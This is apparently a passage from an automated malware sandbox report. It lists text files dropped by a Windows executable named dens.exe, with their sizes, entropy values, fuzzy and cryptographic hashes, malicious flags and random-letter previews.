                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                            MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                            SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                            SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                            SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                            MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                            SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                            SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                            SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                            MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                            SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                            SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                            SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
